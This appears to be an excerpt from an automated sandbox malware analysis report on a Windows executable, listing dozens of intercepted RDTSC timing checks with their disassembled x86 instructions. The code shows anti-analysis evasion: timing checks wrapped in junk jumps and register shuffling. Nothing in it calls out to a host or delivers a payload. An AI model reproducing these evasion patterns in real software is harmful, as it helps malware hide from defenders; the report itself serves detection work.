            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00046 second address: 4E000E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov eax, edx 0x0000000f pushfd 0x00000010 jmp 00007FA4C902634Dh 0x00000015 add al, FFFFFFC6h 0x00000018 jmp 00007FA4C9026351h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 push esi 0x00000022 mov ecx, ebx 0x00000024 pop edi 0x00000025 pushfd 0x00000026 jmp 00007FA4C9026354h 0x0000002b jmp 00007FA4C9026355h 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 jmp 00007FA4C902634Eh 0x00000039 and esp, FFFFFFF8h 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA4C9026357h 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E000E6 second address: 4E0010A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E0010A second address: 4E0011D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E0011D second address: 4E0015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C908415Fh 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA4C908415Eh 0x00000017 sub si, 6548h 0x0000001c jmp 00007FA4C908415Bh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E0015A second address: 4E0015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E0015F second address: 4E001B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA4C9084165h 0x00000009 jmp 00007FA4C908415Bh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FA4C9084168h 0x00000015 or ax, 9A08h 0x0000001a jmp 00007FA4C908415Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E001B8 second address: 4E001BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E001BC second address: 4E001D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E001D7 second address: 4E001DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E001DD second address: 4E001FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA4C9084163h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E001FB second address: 4E00221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov dh, ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA4C9026354h 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00221 second address: 4E00227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00227 second address: 4E0022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E0022B second address: 4E0025E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f mov esi, ebx 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007FA4C9084166h 0x00000018 mov dword ptr [esp], esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ecx, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E0025E second address: 4E00263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00263 second address: 4E00269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00269 second address: 4E0026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E0026D second address: 4E00293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA4C9084169h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00293 second address: 4E002CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C9026357h 0x00000008 mov ah, 1Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e pushad 0x0000000f pushad 0x00000010 movzx eax, bx 0x00000013 movsx edx, cx 0x00000016 popad 0x00000017 mov esi, 4FFC8CA1h 0x0000001c popad 0x0000001d mov dword ptr [esp], edi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E002CB second address: 4E002CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E002CF second address: 4E002E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026355h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E002E8 second address: 4E0031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C9084167h 0x00000008 mov edx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA4C9084161h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E0031C second address: 4E00364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA53B6B462Ah 0x0000000f jmp 00007FA4C902634Eh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c mov cl, 36h 0x0000001e push edi 0x0000001f mov ax, 56A5h 0x00000023 pop eax 0x00000024 popad 0x00000025 je 00007FA53B6B461Bh 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 mov bl, ah 0x00000032 popad 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00364 second address: 4E00388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 pushad 0x00000011 mov dx, E92Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00388 second address: 4E003DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 or edx, dword ptr [ebp+0Ch] 0x00000009 jmp 00007FA4C9026351h 0x0000000e test edx, 61000000h 0x00000014 pushad 0x00000015 mov eax, 5CF3F363h 0x0000001a mov di, cx 0x0000001d popad 0x0000001e jne 00007FA53B6B461Ch 0x00000024 pushad 0x00000025 mov ecx, 46B9EAB7h 0x0000002a mov di, cx 0x0000002d popad 0x0000002e test byte ptr [esi+48h], 00000001h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FA4C9026355h 0x00000039 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E1001F second address: 4E1002E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E1002E second address: 4E10046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9026354h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E10046 second address: 4E1004A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E1004A second address: 4E100AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FA4C9026357h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov dx, cx 0x00000016 mov esi, 33438017h 0x0000001b popad 0x0000001c and esp, FFFFFFF8h 0x0000001f jmp 00007FA4C902634Ah 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FA4C902634Dh 0x0000002e sub ah, FFFFFFF6h 0x00000031 jmp 00007FA4C9026351h 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E100AE second address: 4E100B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E100B3 second address: 4E10148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, ax 0x0000000d pushfd 0x0000000e jmp 00007FA4C902634Ch 0x00000013 add eax, 1B61F648h 0x00000019 jmp 00007FA4C902634Bh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 mov eax, edi 0x00000024 popad 0x00000025 push esp 0x00000026 pushad 0x00000027 jmp 00007FA4C9026358h 0x0000002c pushfd 0x0000002d jmp 00007FA4C9026352h 0x00000032 and ax, 2B08h 0x00000037 jmp 00007FA4C902634Bh 0x0000003c popfd 0x0000003d popad 0x0000003e mov dword ptr [esp], esi 0x00000041 pushad 0x00000042 mov ebx, esi 0x00000044 popad 0x00000045 mov esi, dword ptr [ebp+08h] 0x00000048 jmp 00007FA4C902634Dh 0x0000004d sub ebx, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 mov dx, si 0x00000055 mov cx, 4A7Bh 0x00000059 popad 0x0000005a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E10148 second address: 4E10158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C908415Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E10158 second address: 4E1015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E1015C second address: 4E101ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FA4C9084167h 0x0000000f je 00007FA53B6FA367h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FA4C9084164h 0x0000001c xor esi, 68B26558h 0x00000022 jmp 00007FA4C908415Bh 0x00000027 popfd 0x00000028 mov edx, ecx 0x0000002a popad 0x0000002b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000032 jmp 00007FA4C9084162h 0x00000037 mov ecx, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c call 00007FA4C908415Dh 0x00000041 pop ecx 0x00000042 call 00007FA4C9084161h 0x00000047 pop ecx 0x00000048 popad 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E101ED second address: 4E10285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA53B69C4EAh 0x0000000f pushad 0x00000010 jmp 00007FA4C902634Eh 0x00000015 pushfd 0x00000016 jmp 00007FA4C9026352h 0x0000001b jmp 00007FA4C9026355h 0x00000020 popfd 0x00000021 popad 0x00000022 test byte ptr [77516968h], 00000002h 0x00000029 jmp 00007FA4C902634Eh 0x0000002e jne 00007FA53B69C4A9h 0x00000034 jmp 00007FA4C9026350h 0x00000039 mov edx, dword ptr [ebp+0Ch] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA4C9026357h 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E10285 second address: 4E1028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E1028B second address: 4E1028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E1028F second address: 4E102E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a push esi 0x0000000b pushfd 0x0000000c jmp 00007FA4C9084169h 0x00000011 add cl, 00000036h 0x00000014 jmp 00007FA4C9084161h 0x00000019 popfd 0x0000001a pop eax 0x0000001b mov al, dl 0x0000001d popad 0x0000001e mov dword ptr [esp], ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FA4C908415Fh 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E102E1 second address: 4E10392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov cl, 98h 0x0000000d pushfd 0x0000000e jmp 00007FA4C9026359h 0x00000013 and ecx, 5E411556h 0x00000019 jmp 00007FA4C9026351h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FA4C9026351h 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FA4C902634Ch 0x0000002e or esi, 7297DEA8h 0x00000034 jmp 00007FA4C902634Bh 0x00000039 popfd 0x0000003a movzx eax, bx 0x0000003d popad 0x0000003e push dword ptr [ebp+14h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FA4C902634Ch 0x0000004a or ax, D108h 0x0000004f jmp 00007FA4C902634Bh 0x00000054 popfd 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E10392 second address: 4E10397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E10397 second address: 4E103C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4C9026355h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E103C4 second address: 4E103D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C908415Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E103ED second address: 4E10445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA4C9026351h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FA4C9026351h 0x0000000f xor esi, 2B952D96h 0x00000015 jmp 00007FA4C9026351h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pop esi 0x0000001f jmp 00007FA4C902634Eh 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E10445 second address: 4E10449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E10449 second address: 4E1044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E1044F second address: 4E10456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E10456 second address: 4E10499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esp, ebp 0x00000009 pushad 0x0000000a mov ah, 7Dh 0x0000000c pushfd 0x0000000d jmp 00007FA4C902634Fh 0x00000012 sub ecx, 6070242Eh 0x00000018 jmp 00007FA4C9026359h 0x0000001d popfd 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E10499 second address: 4E104D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA4C9084169h 0x0000000a and ecx, 42365316h 0x00000010 jmp 00007FA4C9084161h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E71BFE second address: 4E71C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4C9026358h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E71C38 second address: 4E71C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E71C47 second address: 4E71C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9026354h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E71C5F second address: 4E71CFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA4C908415Fh 0x00000013 sbb cl, 0000006Eh 0x00000016 jmp 00007FA4C9084169h 0x0000001b popfd 0x0000001c mov ecx, 1708D2F7h 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 push esi 0x00000025 jmp 00007FA4C908415Fh 0x0000002a pop ecx 0x0000002b mov ebx, 6ED27D2Ch 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FA4C908415Bh 0x00000038 push 0000007Fh 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FA4C908415Bh 0x00000043 sub cx, 64DEh 0x00000048 jmp 00007FA4C9084169h 0x0000004d popfd 0x0000004e push eax 0x0000004f pop edi 0x00000050 popad 0x00000051 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E71D4C second address: 4E71D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E71D52 second address: 4E71D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E71D61 second address: 4E71D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E71D65 second address: 4E71D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E71D80 second address: 4E71BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c lea eax, dword ptr [ebp-10h] 0x0000000f push eax 0x00000010 call ebx 0x00000012 mov edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA4C9026357h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E3096B second address: 4E30992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4C908415Dh 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30992 second address: 4E309AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E309AF second address: 4E309B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E309B3 second address: 4E309B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E309B9 second address: 4E309CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9084161h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E309CE second address: 4E309D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E309D2 second address: 4E309E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, AF15h 0x00000010 push eax 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E105C2 second address: 4E105D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, 3D28253Eh 0x00000011 mov edi, 53FD574Ah 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E105D9 second address: 4E105DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
